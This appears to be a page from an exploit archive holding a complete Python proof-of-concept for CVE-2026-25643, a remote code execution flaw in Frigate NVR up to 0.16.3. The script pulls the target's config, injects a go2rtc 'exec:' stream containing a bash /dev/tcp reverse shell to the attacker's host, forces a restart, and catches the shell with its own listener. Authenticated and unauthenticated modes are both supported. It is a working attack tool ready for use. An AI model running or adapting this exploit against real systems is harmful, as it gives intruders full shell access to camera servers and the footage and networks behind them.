4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / frigate_rce.py PY
# Exploit Title: Frigate NVR <= 0.16.3 - RCE (Authenticated & Unauthenticated)
# Date: 2026-02-05
# Exploit Author: jduardo2704
# Vendor Homepage: https://frigate.video/
# Software Link: https://github.com/blakeblackshear/frigate
# Version: <= 0.16.3
# Tested on: Linux / Docker
# CVE: CVE-2026-25643
# Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
import socket
import threading
import select
import re

# Silence SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Colors
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
RESET = '\033[0m'

# Event to synchronize the listener with the exploit thread
exploit_ready = threading.Event()

def print_status(msg, color=BLUE, symbol="[*]"):
    print(f"{color}{symbol} {msg}{RESET}")

def login_frigate(session, url, username, password):
    try:
        print_status(f"Authenticating as {username}...", BLUE)
        res = session.post(f"{url}/api/login", json={"user": username, "password": password}, verify=False, timeout=10)
        return res.status_code == 200
    except:
        return False

def get_config(session, url):
    try:
        res = session.get(f"{url}/api/config/raw", timeout=10)
        content = res.text.strip()
        if content.startswith('"'):
            try:
                config_raw = json.loads(content)
            except:
                config_raw = content
        else:
            config_raw = content
            
        return yaml.safe_load(config_raw)
    except:
        return None

def send_payload(session, url, data):
    final_yaml = yaml.dump(data)
    try:
        session.post(
            f"{url}/api/config/save?save_option=restart", 
            data=final_yaml, 
            headers={"Content-Type": "text/plain"}, 
            timeout=5 
        )
    except:
        pass 

def inject_and_exploit(url, username, password, lhost, lport):
    """Function to run in background thread"""
    session = requests.Session()
    session.verify = False

    # 1. AUTHENTICATION LOGIC
    if username and password:
        if not login_frigate(session, url, username, password):
            print_status("Login failed with provided credentials.", RED, "[-]")
            sys.exit(1) 
        print_status("Logged in successfully.", BLUE)
    else:
        print_status("No credentials provided. Trying unauthenticated access...", YELLOW)

    # 2. CONFIG RETRIEVAL & VALIDATION
    print_status("Fetching configuration...", BLUE)
    config = get_config(session, url)
    
    if not config or not isinstance(config, dict):
        print_status("Failed to retrieve a valid configuration dictionary.", RED, "[-]")
        print_status("Target might be authenticated or API is restricted.", RED, "[-]")
        sys.exit(1)

    # 3. PAYLOAD PREPARATION
    try:
        payload = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
        
        # Inject go2rtc
        if 'go2rtc' not in config or config['go2rtc'] is None: config['go2rtc'] = {}
        if 'streams' not in config['go2rtc'] or config['go2rtc']['streams'] is None: config['go2rtc']['streams'] = {}
        config['go2rtc']['streams']['cve_poc'] = [f"exec:{payload}"]

        # Inject camera trigger
        if 'cameras' not in config or config['cameras'] is None: config['cameras'] = {}
        config['cameras']['cve_trigger'] = {
            'ffmpeg': {'inputs': [{'path': 'rtsp://127.0.0.1:8554/cve_poc', 'roles': ['detect']}]},
            'detect': {'enabled': False},
            'audio': {'enabled': False}, 
            'enabled': True
        }
        
        print_status("Payload injected into config structure.", GREEN, "[+]")

        # 4. SIGNAL LISTENER TO START
        exploit_ready.set()
        time.sleep(5) 
        print_status("Sending malicious config & triggering restart...", YELLOW)
        send_payload(session, url, config)

    except Exception as e:
        print_status(f"Error during payload injection: {e}", RED, "[-]")
        sys.exit(1)

def shell_handler(lport):
    """Handles the incoming reverse shell connection"""
    
    print_status("Waiting for validation...", BLUE)
    if not exploit_ready.wait(timeout=20): 
        print_status("Timeout waiting for exploit thread validation.", RED, "[-]")
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        s.bind(('0.0.0.0', int(lport)))
        s.listen(1)
        print_status(f"Validation OK. Listening on 0.0.0.0:{lport}...", GREEN, "[+]")
        s.settimeout(60) 
        
        try:
            conn, addr = s.accept()
            print_status(f"Connection received from {addr[0]}!", GREEN, "[+]")
            print(f"{YELLOW}--- SHELL ESTABLISHED ---\n{RESET}")
            
            s.settimeout(None) 
            conn.settimeout(None)

            while True:
                r, _, _ = select.select([sys.stdin, conn], [], [])
                
                if conn in r:
                    data = conn.recv(4096)
                    if not data: break
                    
                    # CLEAN OUTPUT LOGIC
                    output = data.decode(errors='ignore')
                    
                    # Remove annoying bash TTY errors using Regex
                    # Matches "bash: cannot set terminal process group (PID): Inappropriate ioctl..."
                    output = re.sub(r"bash: cannot set terminal process group \(\d+\): Inappropriate ioctl for device\r?\n?", "", output)
                    # Matches "bash: no job control in this shell"
                    output = output.replace("bash: no job control in this shell\r\n", "")
                    output = output.replace("bash: no job control in this shell\n", "")
                    
                    sys.stdout.write(output)
                    sys.stdout.flush()
                    
                if sys.stdin in r:
                    cmd = sys.stdin.readline()
                    conn.send(cmd.encode())

        except socket.timeout:
            print_status("Exploit sent but no connection received (Timeout > 60s).", RED, "[-]")

    except KeyboardInterrupt:
        print_status("\nClosing connection.", RED)
    except Exception as e:
        print_status(f"Listener error: {e}", RED)
    finally:
        s.close()

def main():
    parser = argparse.ArgumentParser(description="Frigate <= 0.16.3 RCE (Auto-Shell) - CVE-2026-25643")
    parser.add_argument('-u', '--url', required=True, help="Target URL")
    parser.add_argument('-U', '--username', required=False, help="Username (optional)")
    parser.add_argument('-P', '--password', required=False, help="Password (optional)")
    parser.add_argument('-lh', '--lhost', required=True, help="Your IP (LHOST)")
    parser.add_argument('-lp', '--lport', required=True, help="Your Port (LPORT)")
    args = parser.parse_args()

    exploit_thread = threading.Thread(
        target=inject_and_exploit, 
        args=(args.url.rstrip('/'), args.username, args.password, args.lhost, args.lport)
    )
    exploit_thread.daemon = True
    exploit_thread.start()

    shell_handler(args.lport)

if __name__ == "__main__":
    main()